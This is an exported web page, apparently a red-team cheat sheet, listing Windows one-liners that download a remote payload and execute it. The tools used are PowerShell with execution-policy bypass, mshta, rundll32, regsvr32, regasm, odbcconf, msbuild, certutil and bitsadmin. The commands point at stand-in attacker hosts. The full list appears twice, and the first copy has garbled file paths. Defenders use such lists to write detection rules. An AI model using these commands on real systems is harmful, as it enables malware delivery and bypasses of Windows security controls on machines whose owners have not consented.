<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Windows - Download and Execute</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="aec6189a-610c-40e8-bc19-3244dfda5aae" class="page sans"><header><h1 class="page-title">Windows - Download and Execute</h1></header><div class="page-body"><h1 id="069f55fb-53e7-4c97-a637-95de3473e8c4" class="">Windows - Download and execute methods</h1><h2 id="c603f358-6ee7-45b8-be7c-19d482ee00f1" class="">Downloaded files location</h2><ul id="059306bf-ec1a-47c5-aab0-eedc1f0e7913" class="bulleted-list"><li>C:&lt;username&gt;Internet Files</li></ul><ul id="1a8265c9-4462-4e83-aa12-9fb429085d99" class="bulleted-list"><li>C:&lt;username&gt;&lt;subdir&gt;</li></ul><ul id="7c1e745b-e6b1-4858-8b9f-232ef6789d7f" class="bulleted-list"><li>C:_DAV</li></ul><h2 id="c516a98a-abc3-49af-8925-e8bae0d9847f" class="">Powershell</h2><p id="11788d75-2323-4c0a-a73f-fb08e286583c" class="">From an HTTP server</p><pre id="26f0287f-8039-4ab4-ba37-995cb17b9566" class="code"><code>powershell -exec bypass -c &quot;(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(&#x27;http://webserver/payload.ps1&#x27;)|iex&quot;</code></pre><p id="daf6f402-a987-454e-9ce0-aec93c17a7c2" class="">From a Webdav server</p><pre id="c7cd487c-2588-483d-8f5b-97e59c393ecf" class="code"><code>powershell -exec bypass -f \\webdavserver\folder\payload.ps1</code></pre><h2 id="843910c3-2944-45f1-b565-a6e770c9c6a6" class="">Cmd</h2><pre id="1d356f0f-df9c-4ec9-b8f9-0cf4390af7da" class="code"><code>cmd.exe /k &lt; \\webdavserver\folder\batchfile.txt</code></pre><h2 id="fe26fa7c-9a60-4258-9b88-5e030efb7bd6" class="">Cscript / Wscript</h2><pre id="f50b679e-15d7-4ba4-9a94-755929195646" class="code"><code>cscript //E:jscript \\webdavserver\folder\payload.txt</code></pre><h2 id="69c875eb-5493-480a-bd45-3655685b0965" class="">Mshta</h2><pre id="a9a2a007-97a6-4723-80fc-60ac4a4a66e8" class="code"><code>mshta vbscript:Close(Execute(&quot;GetObject(&quot;&quot;script:http://webserver/payload.sct&quot;&quot;)&quot;))</code></pre><pre id="1724886f-96f3-46ad-b92c-1d2700da3189" class="code"><code>mshta http://webserver/payload.hta</code></pre><pre id="c183d14f-4b04-4122-ba1f-9e83e72281a3" class="code"><code>mshta \\webdavserver\folder\payload.hta</code></pre><h2 id="01888896-fbc4-4291-a426-3258648a2223" class="">Rundll32</h2><pre id="794610e3-1ff7-4dca-ab75-ab13b666b2a0" class="code"><code>rundll32 \\webdavserver\folder\payload.dll,entrypoint</code></pre><pre id="ccb02c9c-e85c-4e87-aa98-4cc25295126a" class="code"><code>rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication&quot;;o=GetObject(&quot;script:http://webserver/payload.sct&quot;);window.close();</code></pre><h2 id="bbc70b68-c254-41fe-a046-b7f916f45e8b" class="">Regasm / Regsvc @subTee</h2><pre id="843fb527-5ddc-443a-99a3-be0dc97c3013" class="code"><code>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll</code></pre><h2 id="473db240-35ba-49d4-adb1-a58715b9fce3" class="">Regsvr32 @subTee</h2><pre id="040f3908-d983-4a1b-b933-b4582c1ef58f" class="code"><code>regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll</code></pre><pre id="5af3d62b-c51e-458f-a33f-31224b8b47a1" class="code"><code>regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll</code></pre><h2 id="ae7d8ab2-89e7-421a-8e36-7d38d4c1a27b" class="">Odbcconf</h2><pre id="1d68888d-f786-4eca-b2df-a63512bc269b" class="code"><code>odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}</code></pre><h2 id="28bda511-067c-414b-8738-c36559e50de6" class="">Msbuild</h2><pre id="331b3c61-ef6c-467b-9e7d-da2d45282f57" class="code"><code>cmd /V /c &quot;set MB=&quot;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe&quot; &amp; !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml &gt; payload.xml &amp; !MB! payload.xml&quot;</code></pre><h2 id="f2a915b6-9e57-42c1-a34a-39972c34d762" class="">Certutil</h2><pre id="a65d6349-b479-4d1a-92db-ae516332ffae" class="code"><code>certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &amp; certutil -decode payload.b64 payload.dll &amp; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll</code></pre><pre id="00f0190a-3d54-41ec-83cb-577672f8ac9d" class="code"><code>certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &amp; certutil -decode payload.b64 payload.exe &amp; payload.exe</code></pre><h2 id="0855fc0d-7d6e-4720-b25a-6772090f6f6c" class="">Bitsadmin</h2><pre id="e7746aab-0f22-44ca-ada3-9c67068cdc62" class="code"><code>bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;attackerIP&gt;/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe</code></pre><h2 id="098a5118-98c2-43c3-8bca-6400f3f0e6c7" class="">References</h2><ul id="889c9c54-087b-4188-b6bc-3710f98d6ebb" class="bulleted-list"><li><a href="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/">arno0x0x - Windows oneliners to download remote payload and execute arbitrary code</a></li></ul><h1 id="920c7898-e369-45ba-a762-7128afdaeaae" class="">Windows - Download and execute methods</h1><h2 id="d352e77e-10b3-49d8-b414-051cd1493f43" class="">Downloaded files location</h2><ul id="c55cdb10-be58-4a71-acde-ed4b41fe7463" class="bulleted-list"><li>C:\Users&lt;username&gt;\AppData\Local\Microsoft\Windows\Temporary Internet Files\</li></ul><ul id="5f2ced10-9c0d-4c09-a522-2d9d3dc956b2" class="bulleted-list"><li>C:\Users&lt;username&gt;\AppData\Local\Microsoft\Windows\INetCache\IE&lt;subdir&gt;</li></ul><ul id="58dcf455-6fd2-4dd7-9c85-e17f02b2098d" class="bulleted-list"><li>C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV</li></ul><h2 id="2224fbd6-2e8d-4b0d-83cf-4d7df2ea2915" class="">Powershell</h2><p id="32051e85-3bde-48f5-91d6-86645fe4c05b" class="">From an HTTP server</p><pre id="cc2ed983-18e4-43c8-878c-ab2ae5cd1d4d" class="code"><code>powershell -exec bypass -c &quot;(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(&#x27;http://webserver/payload.ps1&#x27;)|iex&quot;</code></pre><p id="18a1d676-1e6c-46a9-97ef-89f1ce542e67" class="">From a Webdav server</p><pre id="3ed7c4fc-d559-4747-87da-c8a4f3aa5e83" class="code"><code>powershell -exec bypass -f \\webdavserver\folder\payload.ps1</code></pre><h2 id="d3bd72b6-4f09-4e96-b849-98d0264f2bec" class="">Cmd</h2><pre id="b79c653e-19ab-4b4b-aa0c-529cbe7cc1ee" class="code"><code>cmd.exe /k &lt; \\webdavserver\folder\batchfile.txt</code></pre><h2 id="0c235329-459f-492a-ab8b-dfe1c7774000" class="">Cscript / Wscript</h2><pre id="2dd2e940-9a46-41bf-84e9-bf408357669e" class="code"><code>cscript //E:jscript \\webdavserver\folder\payload.txt</code></pre><h2 id="331ee6a0-2795-4fff-9599-2ae1a3dbba7f" class="">Mshta</h2><pre id="d44efab4-e73e-4fc4-a709-8eb22a4ce26d" class="code"><code>mshta vbscript:Close(Execute(&quot;GetObject(&quot;&quot;script:http://webserver/payload.sct&quot;&quot;)&quot;))</code></pre><pre id="a6aeb5bc-b4f8-4e33-8b55-51ff62c813c1" class="code"><code>mshta http://webserver/payload.hta</code></pre><pre id="546227d6-b498-4712-acb1-d9e9e746021d" class="code"><code>mshta \\webdavserver\folder\payload.hta</code></pre><h2 id="756c4f52-5f5f-4bcf-9de0-dd1d56b2e97f" class="">Rundll32</h2><pre id="88dae2e8-c77e-4e29-a6a7-38780b394233" class="code"><code>rundll32 \\webdavserver\folder\payload.dll,entrypoint</code></pre><pre id="21c51dcc-7b3f-44f3-bf92-30ae0ad57ebf" class="code"><code>rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication&quot;;o=GetObject(&quot;script:http://webserver/payload.sct&quot;);window.close();</code></pre><h2 id="763725ae-e3fc-48a4-b963-e68fa1351b69" class="">Regasm / Regsvc @subTee</h2><pre id="fa860030-2540-4ca7-82e6-a64245d3fd60" class="code"><code>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll</code></pre><h2 id="a226d528-2b22-4e94-abb8-a947613673a4" class="">Regsvr32 @subTee</h2><pre id="8d96362b-afbb-4d3a-932f-3172026a2783" class="code"><code>regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll</code></pre><pre id="0b13864c-3da8-4e91-8c9f-ea6961c8dc07" class="code"><code>regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll</code></pre><h2 id="af60ea69-1c07-4786-99a2-2826dac49ce9" class="">Odbcconf</h2><pre id="a8a9d917-ce96-4a48-be2a-a7a43efbc4aa" class="code"><code>odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}</code></pre><h2 id="0e8fe80a-a8f2-4e21-9f3e-be14ed2130cc" class="">Msbuild</h2><pre id="db4d75a5-d4a9-460a-bda0-3ec7b4e49423" class="code"><code>cmd /V /c &quot;set MB=&quot;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe&quot; &amp; !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml &gt; payload.xml &amp; !MB! payload.xml&quot;</code></pre><h2 id="f02acef9-0c69-4e25-bc9b-d2d2c5e5d000" class="">Certutil</h2><pre id="c34358b0-34dc-418d-9363-c1b22b7705b4" class="code"><code>certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &amp; certutil -decode payload.b64 payload.dll &amp; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll</code></pre><pre id="b666803e-8d0e-47f7-9baf-da7fe0cc6161" class="code"><code>certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &amp; certutil -decode payload.b64 payload.exe &amp; payload.exe</code></pre><h2 id="e92b7889-f265-4804-b45c-201cc75d106a" class="">Bitsadmin</h2><pre id="1a77da76-1805-4ddd-8a22-5ec4860bacf0" class="code"><code>bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;attackerIP&gt;/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe</code></pre><h2 id="e1a65ef8-223c-4f28-911f-aa91280463a4" class="">References</h2><ul id="a239104c-964e-4252-86c4-684d9f5b16ad" class="bulleted-list"><li><a href="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/">arno0x0x - Windows oneliners to download remote payload and execute arbitrary code</a></li></ul></div></article></body></html>